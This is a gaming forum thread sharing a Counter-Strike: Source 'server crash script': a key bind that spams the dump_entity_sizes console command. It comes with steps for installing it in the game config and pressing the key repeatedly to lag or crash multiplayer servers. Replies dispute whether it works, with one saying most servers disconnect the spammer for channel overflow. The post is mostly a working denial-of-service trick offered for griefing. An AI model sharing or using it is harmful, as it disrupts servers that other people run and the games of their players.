[CSS] Server Crash Script

nextlive

[glow=black,2,300]  Server Crash Script  [/glow]

bind "v" "dump_entity_sizes;dump_entity_sizes;dump_entity_sizes;dump_entity_sizes;dump_ent ? ity_sizes;dump_entity_sizes;dump_entity_sizes;dump_entity_sizes;dump_entity_size ? s;dump_entity_sizes;dump_entity_sizes;dump_entity_sizes;dump_entity_sizes;dump_e ? ntity_sizes;dump_entity_sizes;dump_entity_sizes;dump_entity_sizes;dump_entity_si ?zes;dump_entity_sizes;dump_entity_sizes"

-=How to Install=-

Copy this to C:\Program Files\Counter-Strike Source\cstrike\cfg\config.cfg

-=How to use=-

Press v many times and the server will crash!  :-*

It works, but theres to things i noticed.

1. some servers have someway a protection from server side, and the bind spammer does nothing to server. (no lag)

2. It wont crash the server and force to shut down and reconnect.

The most you do it's to stop players with hell lagg, and they will be forced to reconnect if they want to unstuck.

anyway, from me it's a great share here (:

• 1 month later...

Ehh man,don't be so sure work this thing dosn't work on mostly servers on internet and let me tell you right,when you try to make it the server says you The Chanel is OverFlowed and will disconect you automaticaly so no way,if you try to make it on a lan server,him can restart the server and no problem,Useless but anyway Thx For Share  ;)

Regards,

AzK

Ehh man,don't be so sure work this thing dosn't work on mostly servers on internet and let me tell you right,when you try to make it the server says you The Chanel is OverFlowed and will disconect you automaticaly so no way,if you try to make it on a lan server,him can restart the server and no problem,Useless but anyway Thx For Share  ;)

Regards,

AzK

i have tried this script to many servers and it works.... :)

• 1 month later...
  • 2 weeks later...